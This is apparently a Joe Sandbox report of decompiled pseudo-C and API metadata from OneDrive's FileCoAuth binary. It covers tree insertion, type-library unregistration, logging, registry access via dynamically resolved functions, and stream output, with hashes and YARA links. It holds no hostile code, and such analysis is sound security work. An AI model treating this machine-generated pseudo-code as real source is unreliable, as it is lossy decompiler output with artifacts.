				intOrPtr* _t111;
				intOrPtr* _t113;
				char** _t117;

				_t106 = __edi;
				_t90 = __ebx;
				_push(0);
				_t59 = E00EA3161(E00EA3F58, __ebx, __edi, __esi);
				_t110 = _a8;
				_v4 = _v4 & 0x00000000;
				while(_t110 != _a12) {
					_t93 = _a32;
					if(_t93 == 0) {
						__imp__?_Xbad_function_call@std@@YAXXZ();
						asm("int3");
						_push(_t90);
						_t91 = _t93;
						_push(_t110);
						_push(_t106);
						_t60 =  *((intOrPtr*)(_t91 + 4));
						if(_t60 >= 0x3fffffe) {
							_t113 = _a20;
							_t60 = E00E94F21(_t113 + 0x10);
							L00EA29EC();
							 *_t117 = "map/set<T> too long";
							__imp__?_Xlength_error@std@@YAXPBD@Z(_t113);
						}
						_t107 = _a20;
						 *((intOrPtr*)(_t91 + 4)) = _t60 + 1;
						_t62 = _a12;
						 *((intOrPtr*)(_t107 + 4)) = _t62;
						_t94 =  *_t91;
						if(_t62 != _t94) {
							if(_a8 == 0) {
								 *((intOrPtr*)(_t62 + 8)) = _t107;
								_t95 =  *_t91;
								if(_t62 ==  *((intOrPtr*)(_t95 + 8))) {
									 *((intOrPtr*)(_t95 + 8)) = _t107;
								}
							} else {
								 *_t62 = _t107;
								_t101 =  *_t91;
								if(_t62 ==  *_t101) {
									 *_t101 = _t107;
								}
							}
						} else {
							 *((intOrPtr*)(_t94 + 4)) = _t107;
							 *((intOrPtr*)( *_t91)) = _t107;
							 *((intOrPtr*)( *_t91 + 8)) = _t107;
						}
						_t63 =  *((intOrPtr*)(_t107 + 4));
						_t111 = _t107;
						while( *((char*)(_t63 + 0xc)) == 0) {
							_t64 =  *((intOrPtr*)(_t111 + 4));
							_t105 =  *((intOrPtr*)(_t64 + 4));
							_t96 =  *_t105;
							if(_t64 != _t96) {
								if( *((char*)(_t96 + 0xc)) != 0) {
									if(_t111 ==  *_t64) {
										_t111 = _t64;
										E00E95088(_t91, _t111);
									}
									 *((char*)( *((intOrPtr*)(_t111 + 4)) + 0xc)) = 1;
									 *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t111 + 4)) + 4)) + 0xc)) = 0;
									E00E95042(_t91,  *((intOrPtr*)( *((intOrPtr*)(_t111 + 4)) + 4)));
								} else {
									goto L23;
								}
							} else {
								_t96 =  *((intOrPtr*)(_t105 + 8));
								if( *((char*)(_t96 + 0xc)) == 0) {
									L23:
									 *((char*)(_t64 + 0xc)) = 1;
									 *((char*)(_t96 + 0xc)) = 1;
									 *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t111 + 4)) + 4)) + 0xc)) = 0;
									_t111 =  *((intOrPtr*)( *((intOrPtr*)(_t111 + 4)) + 4));
								} else {
									if(_t111 ==  *((intOrPtr*)(_t64 + 8))) {
										_t111 = _t64;
										E00E95042(_t91, _t111);
									}
									 *((char*)( *((intOrPtr*)(_t111 + 4)) + 0xc)) = 1;
									 *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t111 + 4)) + 4)) + 0xc)) = 0;
									E00E95088(_t91,  *((intOrPtr*)( *((intOrPtr*)(_t111 + 4)) + 4)));
								}
							}
							_t63 =  *((intOrPtr*)(_t111 + 4));
						}
						 *((char*)( *((intOrPtr*)( *_t91 + 4)) + 0xc)) = 1;
						_t82 = _a4;
						 *_t82 = _t107;
						return _t82;
					} else {
						_push(_t110);
						if( *((intOrPtr*)( *_t93 + 8))() != 0) {
							break;
						} else {
							_t110 = _t110 + 0x11c;
							continue;
						}
					}
					L30:
				}
				_v4 = 1;
				_t86 = E00E9E9D6(_t59,  &_a16);
				_v4 = _v4 | 0xffffffff;
				E00E9E9D6(_t86,  &_a16);
				return E00EA313E(_t110);
				goto L30;
			}
























    0x00e9aead
    0x00e9aead
    0x00e9aead
    0x00e9aeb4
    0x00e9aeb9
    0x00e9aebc
    0x00e9aed9
    0x00e9aec2
    0x00e9aec7
    0x00e9af03
    0x00e9af09
    0x00e9af0f
    0x00e9af10
    0x00e9af12
    0x00e9af13
    0x00e9af14
    0x00e9af1c
    0x00e9af1e
    0x00e9af24
    0x00e9af2a
    0x00e9af2f
    0x00e9af36
    0x00e9af36
    0x00e9af3c
    0x00e9af40
    0x00e9af43
    0x00e9af46
    0x00e9af49
    0x00e9af4d
    0x00e9af61
    0x00e9af6f
    0x00e9af72
    0x00e9af77
    0x00e9af79
    0x00e9af79
    0x00e9af63
    0x00e9af63
    0x00e9af65
    0x00e9af69
    0x00e9af6b
    0x00e9af6b
    0x00e9af69
    0x00e9af4f
    0x00e9af4f
    0x00e9af54
    0x00e9af58
    0x00e9af58
    0x00e9af7c
    0x00e9af7f
    0x00e9b019
    0x00e9af86
    0x00e9af89
    0x00e9af8c
    0x00e9af90
    0x00e9afce
    0x00e9afec
    0x00e9afee
    0x00e9aff3
    0x00e9aff3
    0x00e9affd
    0x00e9b007
    0x00e9b011
    0x00000000
    0x00000000
    0x00000000
    0x00e9af92
    0x00e9af92
    0x00e9af99
    0x00e9afd0
    0x00e9afd0
    0x00e9afd4
    0x00e9afde
    0x00e9afe5
    0x00e9af9b
    0x00e9af9e
    0x00e9afa0
    0x00e9afa5
    0x00e9afa5
    0x00e9afaf
    0x00e9afb9
    0x00e9afc3
    0x00e9afc3
    0x00e9af99
    0x00e9b016
    0x00e9b016
    0x00e9b028
    0x00e9b02c
    0x00e9b02f
    0x00e9b035
    0x00e9aec9
    0x00e9aecb
    0x00e9aed1
    0x00000000
    0x00e9aed3
    0x00e9aed3
    0x00000000
    0x00e9aed3
    0x00e9aed1
    0x00000000
    0x00e9aec7
    0x00e9aede
    0x00e9aee8
    0x00e9aeed
    0x00e9aef4
    0x00e9af00
    0x00000000

    APIs
    • __EH_prolog3.LIBCMT ref: 00E9AEB4
    • ?_Xbad_function_call@std@@YAXXZ.MSVCP120(00000000), ref: 00E9AF03
    • ??3@YAXPAX@Z.MSVCR120 ref: 00E9AF2A
    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(?), ref: 00E9AF36
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: ??3@H_prolog3Xbad_function_call@std@@Xlength_error@std@@
    • String ID: map/set<T> too long
    • API String ID: 2767681651-1285458680
    • Opcode ID: 19ba885601648ef467154a78cf1f99931e57e562f1d891fa1644687f4afe8828
    • Instruction ID: ca81d2c8d79e3d5e0cd66ced0cb073205cc661c4f53c822e2fb25329d97022c3
    • Opcode Fuzzy Hash: 19ba885601648ef467154a78cf1f99931e57e562f1d891fa1644687f4afe8828
    • Instruction Fuzzy Hash: 3521B071601204DFCF00DF18C484A99BBE0FF56324F1990A9F819AB3A2C770ED45CB91
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E928A9, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 71libraryloaderCOMMON
    Download Yara Rule
    C-Code - Quality: 72%
    			E00E928A9(void* __ebx, struct HINSTANCE__* __ecx, signed int __edx, void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v20;
				void* __esi;
				signed int _t23;
				void* _t27;
				signed int _t28;
				intOrPtr* _t32;
				void* _t33;
				void* _t36;
				intOrPtr* _t37;
				struct HINSTANCE__* _t39;
				void* _t41;
				intOrPtr _t47;
				void* _t50;
				signed int _t52;

				_t49 = __edx;
				_t41 = __ebx;
				_t23 =  *0xeb0090; // 0xbb40e64e
				_v8 = _t23 ^ _t52;
				_v16 = _v16 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_t27 = E00E923DD(__ecx, __edx, _t50,  &_v16,  &_v12);
				_t51 = _t27;
				if(_t27 >= 0) {
					_t32 = _v12;
					_t49 =  &_v20;
					_t33 =  *((intOrPtr*)( *_t32 + 0x1c))(_t32,  &_v20);
					_t51 = _t33;
					if(_t33 >= 0) {
						if( *0xeb2330 != 1) {
							L5:
							_t49 = __imp__#186;
						} else {
							_t39 = GetModuleHandleW(L"OLEAUT32.DLL");
							if(_t39 == 0) {
								goto L5;
							} else {
								_t49 = GetProcAddress(_t39, "UnRegisterTypeLibForUser");
								if(_t49 == 0) {
									goto L5;
								}
							}
						}
						_t47 = _v20;
						_t36 =  *_t49(_t47,  *(_t47 + 0x18) & 0x0000ffff,  *(_t47 + 0x1a) & 0x0000ffff,  *((intOrPtr*)(_t47 + 0x10)),  *((intOrPtr*)(_t47 + 0x14)));
						_t51 = _t36;
						_t37 = _v12;
						 *((intOrPtr*)( *_t37 + 0x30))(_t37, _v20);
					}
				}
				_t28 = _v12;
				if(_t28 != 0) {
					 *((intOrPtr*)( *_t28 + 8))(_t28);
				}
				__imp__#6();
				return E00EA29F2(_t41, _v8 ^ _t52, _t49, _t50, _t51, _v16);
			}




















    0x00e928a9
    0x00e928a9
    0x00e928b1
    0x00e928b8
    0x00e928bb
    0x00e928c2
    0x00e928cc
    0x00e928d1
    0x00e928d5
    0x00e928d7
    0x00e928da
    0x00e928e1
    0x00e928e4
    0x00e928e8
    0x00e928f1
    0x00e92914
    0x00e92914
    0x00e928f3
    0x00e928f8
    0x00e92900
    0x00000000
    0x00e92902
    0x00e9290e
    0x00e92912
    0x00000000
    0x00000000
    0x00e92912
    0x00e92900
    0x00e9291a
    0x00e9292e
    0x00e92933
    0x00e92935
    0x00e9293b
    0x00e9293b
    0x00e928e8
    0x00e9293e
    0x00e92943
    0x00e92948
    0x00e92948
    0x00e9294e
    0x00e92964

    APIs
      • Part of subcall function 00E923DD: GetModuleFileNameW.KERNEL32(?,?,00000104,?), ref: 00E92424
    • GetModuleHandleW.KERNEL32(OLEAUT32.DLL), ref: 00E928F8
    • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00E92908
    • #6.OLEAUT32(00000000,00000000,?,?), ref: 00E9294E
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: Module$AddressFileHandleNameProc
    • String ID: OLEAUT32.DLL$UnRegisterTypeLibForUser
    • API String ID: 3556842501-2196524522
    • Opcode ID: 8a60994088e18e840e44f50c5e74f0db1ed0e0a29de38f38ae6bbaad22e6b6f9
    • Instruction ID: 11b62fa77aba3ce167d4146fba5cd72f5b65f11fe7bad45bab32e633f4578d32
    • Opcode Fuzzy Hash: 8a60994088e18e840e44f50c5e74f0db1ed0e0a29de38f38ae6bbaad22e6b6f9
    • Instruction Fuzzy Hash: 40219D71A00219AFCF14DFA5CC44AAE7BB8AF89304F14419CE941FB251DB35ED4ADB60
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E943E5, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 53COMMON
    Download Yara Rule
    APIs
    • ?LoggingWriteStructuredEvent@@YGXPBDI0ABU_GUID@@IIIQAUStructuredEventParameter@@@Z.LOGGINGPLATFORM(d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\storageproviderfinder.cpp,0000005A,StorageProviderFinder::RetrievePropertyHandlerByQueryingAccount,00EA7810,DFB9F0D4,00000001,00000003,00000001), ref: 00E9446C
    • ?LoggingRotateIfNeeded@@YGXXZ.LOGGINGPLATFORM ref: 00E94472
    Strings
    • x, xrefs: 00E94458
    • StorageProviderFinder::RetrievePropertyHandlerByQueryingAccount, xrefs: 00E9444C
    • d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\storageproviderfinder.cpp, xrefs: 00E94453
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: LoggingStructured$EventEvent@@Needed@@Parameter@@@RotateWrite
    • String ID: x$StorageProviderFinder::RetrievePropertyHandlerByQueryingAccount$d:\dbs\sh\odib\0313_155253\cmd\24\client\onedrive\product\filecoauth\filecoauth\storageproviderfinder.cpp
    • API String ID: 2559330748-2045625249
    • Opcode ID: 26d72c3fac011974336052989bec98e061df498194f03f9761570afa8e321def
    • Instruction ID: 01cd56cdc203bb96d061d6793c0d3a0db0e9fa7fdeba063cecdffd76ddd2e718
    • Opcode Fuzzy Hash: 26d72c3fac011974336052989bec98e061df498194f03f9761570afa8e321def
    • Instruction Fuzzy Hash: 271191B0E04308AFCB18CF59EC46AAEBBB0EB4D701F10552EE956BB280D7B16901CF44
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E992D2, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45COMMON
    Download Yara Rule
    C-Code - Quality: 36%
    			E00E992D2(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t26;
				signed int _t29;
				void* _t35;
				void* _t36;
				intOrPtr* _t38;
				void* _t39;

				_push(0x2c);
				E00EA3194(E00EA3C6E, __ebx, __edi, __esi);
				_t38 = __ecx;
				_t26 = 0;
				 *((intOrPtr*)(_t39 - 0x38)) = 0;
				E00E9851B(_t39 - 0x38, "Utilities::IsSystemRtl");
				_t29 = 7;
				 *((intOrPtr*)(_t39 - 4)) = 0;
				_t35 = _t39 - 0x32;
				 *((short*)(_t39 - 0x34)) = 0;
				memset(_t35, 0, _t29 << 2);
				_t36 = _t35 + _t29;
				_push(0x10);
				_push(_t39 - 0x34);
				asm("stosw");
				_push(0x58);
				_push(0x400);
				if( *((intOrPtr*)( *_t38 + 0x1dc))() != 0) {
					_t26 = 0 | ( *(_t39 - 0x26) & 0x00000800) > 0x00000000;
				} else {
					__imp__?LoggingWriteStructuredEvent@@YGXPBDI0ABU_GUID@@IIIQAUStructuredEventParameter@@@Z("d:\\dbs\\sh\\odib\\0313_155253\\cmd\\17\\client\\onedrive\\product\\ux\\shared\\utilities.cpp", 0x7a9, "Utilities::IsSystemRtl", 0xea7d10, 0x772385b, 1, 0, 0);
					__imp__?LoggingRotateIfNeeded@@YGXXZ();
				}
				E00E98588();
				return E00EA3152(_t26, _t36, _t38);
			}









    0x00e992d2
    0x00e992d9
    0x00e992de
    0x00e992e0
    0x00e992ea
    0x00e992ed
    0x00e992f4
    0x00e992f5
    0x00e992f8
    0x00e992fd
    0x00e99301
    0x00e99301
    0x00e99303
    0x00e99308
    0x00e99309
    0x00e9930f
    0x00e99311
    0x00e9931e
    0x00e99352
    0x00e99320
    0x00e9933d
    0x00e99343
    0x00e99343
    0x00e99358
    0x00e99364

    APIs
    • __EH_prolog3_GS.LIBCMT ref: 00E992D9
    • ?LoggingWriteStructuredEvent@@YGXPBDI0ABU_GUID@@IIIQAUStructuredEventParameter@@@Z.LOGGINGPLATFORM(d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\utilities.cpp,000007A9,Utilities::IsSystemRtl,00EA7D10,0772385B,00000001,00000000,00000000), ref: 00E9933D
    • ?LoggingRotateIfNeeded@@YGXXZ.LOGGINGPLATFORM ref: 00E99343
    Strings
    • Utilities::IsSystemRtl, xrefs: 00E992E5, 00E9932E
    • d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\utilities.cpp, xrefs: 00E99338
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: LoggingStructured$EventEvent@@H_prolog3_Needed@@Parameter@@@RotateWrite
    • String ID: Utilities::IsSystemRtl$d:\dbs\sh\odib\0313_155253\cmd\17\client\onedrive\product\ux\shared\utilities.cpp
    • API String ID: 1253850681-2586932742
    • Opcode ID: e8f4486e9465db796047022751caebff3c5ed213fa1c041f45719502cf355d75
    • Instruction ID: 37231d5004eed008b1ec39f9d8ea4d3ba083cc789a594ea46add01eb508f672a
    • Opcode Fuzzy Hash: e8f4486e9465db796047022751caebff3c5ed213fa1c041f45719502cf355d75
    • Instruction Fuzzy Hash: 4601BC30A84304BEEB04EFA8DD86FDD77B1AF1EB00F402829B2057E1D1CEB469088B11
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E91F10, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42registrylibraryloaderCOMMON
    Download Yara Rule
    C-Code - Quality: 68%
    			E00E91F10(intOrPtr* __ecx, void* _a4, short* _a8, int _a16, void** _a20) {
				struct HINSTANCE__* _t13;
				_Unknown_base(*)()* _t14;
				intOrPtr* _t18;

				_t18 = __ecx;
				if( *__ecx == 0) {
					if( *((intOrPtr*)(__ecx + 4)) == 0) {
						L6:
						return 1;
					}
					return RegOpenKeyExW(_a4, _a8, 0, _a16, _a20);
				}
				_t13 = GetModuleHandleW(L"Advapi32.dll");
				if(_t13 == 0) {
					goto L6;
				}
				_t14 = GetProcAddress(_t13, "RegOpenKeyTransactedW");
				if(_t14 == 0) {
					goto L6;
				}
				return  *_t14(_a4, _a8, 0, _a16, _a20,  *_t18, 0);
			}






    0x00e91f16
    0x00e91f1d
    0x00e91f55
    0x00e91f6c
    0x00000000
    0x00e91f6e
    0x00000000
    0x00e91f64
    0x00e91f24
    0x00e91f2c
    0x00000000
    0x00000000
    0x00e91f34
    0x00e91f3c
    0x00000000
    0x00000000
    0x00000000

    APIs
    • GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 00E91F24
    • GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 00E91F34
    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E91F64
    Strings
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: AddressHandleModuleOpenProc
    • String ID: Advapi32.dll$RegOpenKeyTransactedW
    • API String ID: 1337834000-3913318428
    • Opcode ID: 7ed2d7c6f6c4c21312275b4c03c4abf5cfb9b96c6931155562c8b6d080aef4c6
    • Instruction ID: a34a38fe88e7a99c3540645b6122fd71c79c99e6a352e76bffb6addde7b10fbb
    • Opcode Fuzzy Hash: 7ed2d7c6f6c4c21312275b4c03c4abf5cfb9b96c6931155562c8b6d080aef4c6
    • Instruction Fuzzy Hash: ABF04F3220420EBFDF211F92DC04D9B3F7AEF8ABD17049069F956B5020C7329861EB60
    Uniqueness

    Uniqueness Score: -1,00%

    Function 00E97EF0, Relevance: 7.6, APIs: 5, Instructions: 136COMMON
    Download Yara Rule
    C-Code - Quality: 36%
    			E00E97EF0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t61;
				intOrPtr _t62;
				signed int _t64;
				intOrPtr _t65;
				intOrPtr _t67;
				intOrPtr _t71;
				signed int _t76;
				signed short _t78;
				signed int _t81;
				signed short _t83;
				signed int _t87;
				intOrPtr _t90;
				signed int _t91;
				signed int _t98;
				signed int _t102;
				signed int _t106;
				intOrPtr* _t108;
				void* _t111;
				signed int _t113;
				signed int _t115;

				_push(0x24);
				E00EA31CA(E00EA3AE8, __ebx, __edi, __esi);
				_t87 = 0;
				 *(_t111 - 0x28) = 0;
				_t61 = E00E94E74( *((intOrPtr*)(_t111 + 0xc)));
				_t108 =  *((intOrPtr*)(_t111 + 8));
				_t106 = _t61;
				 *(_t111 - 0x24) = _t106;
				_t90 =  *((intOrPtr*)( *_t108 + 4));
				_t62 =  *((intOrPtr*)(_t90 + _t108 + 0x20));
				_t91 =  *(_t90 + _t108 + 0x24);
				_t113 = _t91;
				if(_t113 < 0) {
					L7:
					asm("xorps xmm0, xmm0");
					asm("movlpd [ebp-0x1c], xmm0");
					 *(_t111 - 0x20) =  *(_t111 - 0x18);
					_t64 =  *(_t111 - 0x1c);
				} else {
					if(_t113 > 0) {
						L6:
						_t64 = _t62 - _t106;
						asm("sbb ecx, esi");
						 *(_t111 - 0x20) = _t91;
					} else {
						if(_t62 <= 0) {
							goto L7;
						} else {
							_t115 = _t91;
							if(_t115 < 0) {
								goto L7;
							} else {
								if(_t115 > 0) {
									goto L6;
								} else {
									_t116 = _t62 - _t106;
									if(_t62 <= _t106) {
										goto L7;
									} else {
										goto L6;
									}
								}
							}
						}
					}
				}
				_push(_t108);
				 *(_t111 - 0x18) = _t64;
				_t65 = E00E97E66(_t87, _t111 - 0x30, _t108, 0, _t116);
				 *((intOrPtr*)(_t111 - 4)) = 0;
				if( *((char*)(_t111 - 0x2c)) != 0) {
					 *((char*)(_t111 - 4)) = 1;
					_t67 =  *((intOrPtr*)( *_t108 + 4));
					__eflags = ( *(_t67 + _t108 + 0x14) & 0x000001c0) - 0x40;
					if(( *(_t67 + _t108 + 0x14) & 0x000001c0) == 0x40) {
						L18:
						_t71 =  *((intOrPtr*)( *_t108 + 4));
						__imp__?sputn@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAE_JPB_W_J@Z( *((intOrPtr*)(_t111 + 0xc)),  *(_t111 - 0x24), 0);
						__eflags = _t71 -  *(_t111 - 0x24);
						if(_t71 !=  *(_t111 - 0x24)) {
							L28:
							_t87 = 4;
						} else {
							__eflags = _t106;
							if(_t106 != 0) {
								goto L28;
							} else {
								_t76 =  *(_t111 - 0x18);
								_t98 =  *(_t111 - 0x20);
								while(1) {
									__eflags = _t98;
									if(__eflags < 0) {
										goto L29;
									}
									if(__eflags > 0) {
										L24:
										_t78 =  *( *((intOrPtr*)( *_t108 + 4)) + _t108 + 0x40) & 0x0000ffff;
										__imp__?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z(_t78);
										__eflags = 0xffff - (_t78 & 0x0000ffff);
										if(0xffff != (_t78 & 0x0000ffff)) {
											_t98 =  *(_t111 - 0x20);
											_t76 =  *(_t111 - 0x18) + 0xffffffff;
											 *(_t111 - 0x18) = _t76;
											asm("adc ecx, 0xffffffff");
											 *(_t111 - 0x20) = _t98;
											continue;
										} else {
											_t87 = _t87 | 0x00000004;
										}
									} else {
										__eflags = _t76;
										if(_t76 > 0) {
											goto L24;
										}
									}
									goto L29;
								}
							}
						}
					} else {
						_t81 =  *(_t111 - 0x18);
						_t102 =  *(_t111 - 0x20);
						while(1) {
							__eflags = _t102;
							if(__eflags < 0) {
								break;
							}
							if(__eflags > 0) {
								L15:
								_t83 =  *( *((intOrPtr*)( *_t108 + 4)) + _t108 + 0x40) & 0x0000ffff;
								__imp__?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z(_t83);
								__eflags = 0xffff - (_t83 & 0x0000ffff);
								if(0xffff != (_t83 & 0x0000ffff)) {
									_t102 =  *(_t111 - 0x20);
									_t81 =  *(_t111 - 0x18) + 0xffffffff;
									 *(_t111 - 0x18) = _t81;
									asm("adc ecx, 0xffffffff");
									 *(_t111 - 0x20) = _t102;
									continue;
								} else {
									_t87 = _t87 | 0x00000004;
									__eflags = _t87;
									 *(_t111 - 0x28) = _t87;
								}
							} else {
								__eflags = _t81;
								if(_t81 > 0) {
									goto L15;
								}
							}
							break;
						}
						__eflags = _t87;
						if(_t87 == 0) {
							goto L18;
						}
					}
					L29:
					_t65 =  *((intOrPtr*)( *_t108 + 4));
					 *((intOrPtr*)(_t65 + _t108 + 0x20)) = 0;
					 *((intOrPtr*)(_t65 + _t108 + 0x24)) = 0;
					 *((intOrPtr*)(_t111 - 4)) = 0;
				} else {
					_t87 = 4;
				}
				__imp__?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z(_t87, 0);
				E00E97ED1(_t65, _t111 - 0x30);
				return E00EA313E(_t108);
			}























    0x00e97ef0
    0x00e97ef7
    0x00e97f01
    0x00e97f03
    0x00e97f06
    0x00e97f0b
    0x00e97f0e
    0x00e97f11
    0x00e97f16
    0x00e97f19
    0x00e97f1d
    0x00e97f21
    0x00e97f23
    0x00e97f3e
    0x00e97f3e
    0x00e97f41
    0x00e97f49
    0x00e97f4c
    0x00e97f25
    0x00e97f25
    0x00e97f35
    0x00e97f35
    0x00e97f37
    0x00e97f39
    0x00e97f27
    0x00e97f29
    0x00000000
    0x00e97f2b
    0x00e97f2b
    0x00e97f2d
    0x00000000
    0x00e97f2f
    0x00e97f2f
    0x00000000
    0x00e97f31
    0x00e97f31
    0x00e97f33
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00e97f33
    0x00e97f2f
    0x00e97f2d
    0x00e97f29
    0x00e97f25
    0x00e97f4f
    0x00e97f53
    0x00e97f56
    0x00e97f5b
    0x00e97f62
    0x00e97f6c
    0x00e97f72
    0x00e97f7e
    0x00e97f81
    0x00e97fc3
    0x00e97fc9
    0x00e97fd3
    0x00e97fd9
    0x00e97fdc
    0x00e98044
    0x00e98046
    0x00e97fde
    0x00e97fde
    0x00e97fe0
    0x00000000
    0x00e97fe2
    0x00e97fe2
    0x00e97fe5
    0x00e97fe8
    0x00e97fe8
    0x00e97fea
    0x00000000
    0x00000000
    0x00e97fec
    0x00e97ff2
    0x00e97ff7
    0x00e98001
    0x00e9800f
    0x00e98012
    0x00e98033
    0x00e98036
    0x00e98039
    0x00e9803c
    0x00e9803f
    0x00000000
    0x00e98014
    0x00e98014
    0x00e98014
    0x00e97fee
    0x00e97fee
    0x00e97ff0
    0x00000000
    0x00000000
    0x00e97ff0
    0x00000000
    0x00e97fec
    0x00e97fe8
    0x00e97fe0
    0x00e97f83
    0x00e97f83
    0x00e97f86
    0x00e97f89
    0x00e97f89
    0x00e97f8b
    0x00000000
    0x00000000
    0x00e97f8d
    0x00e97f93
    0x00e97f98
    0x00e97fa2
    0x00e97fb0
    0x00e97fb3
    0x00e9801c
    0x00e9801f
    0x00e98022
    0x00e98025
    0x00e98028
    0x00000000
    0x00e97fb5
    0x00e97fb5
    0x00e97fb5
    0x00e97fb8
    0x00e97fb8
    0x00e97f8f
    0x00e97f8f
    0x00e97f91
    0x00000000
    0x00000000
    0x00e97f91
    0x00000000
    0x00e97f8d
    0x00e97fbb
    0x00e97fbd
    0x00000000
    0x00000000
    0x00e97fbd
    0x00e98047
    0x00e98049
    0x00e9804c
    0x00e98050
    0x00e98078
    0x00e97f64
    0x00e97f66
    0x00e97f66
    0x00e98084
    0x00e9808d
    0x00e98099

    APIs
    • __EH_prolog3_catch.LIBCMT ref: 00E97EF7
    • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP120(?,00000000,00000024,00E98351,?,?), ref: 00E97FA2
    • ?sputn@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAE_JPB_W_J@Z.MSVCP120(00000000,?,00000000,00000000,00000024,00E98351,?,?), ref: 00E97FD3
    • ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP120(?), ref: 00E98001
    • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00E98084
    Memory Dump Source
    • Source File: 00000009.00000001.2084780715.0000000000E91000.00000020.sdmp, Offset: 00E90000, based on PE: true
    • Associated: 00000009.00000001.2084769473.0000000000E90000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084844401.0000000000EA6000.00000002.sdmp Download File
    • Associated: 00000009.00000001.2084865290.0000000000EB0000.00000008.sdmp Download File
    • Associated: 00000009.00000001.2084873636.0000000000EB3000.00000002.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_e90000_FileCoAuth.jbxd
    Similarity
    • API ID: U?$char_traits@_W@std@@@std@@$?sputc@?$basic_streambuf@_$?setstate@?$basic_ios@_?sputn@?$basic_streambuf@_H_prolog3_catch
    • String ID:
    • API String ID: 1687759287-0
    • Opcode ID: d503dfbe023836dc4c05f5a6cb5aff9c7ee3a770bf5e7bbb11a04ee6c8a083f2
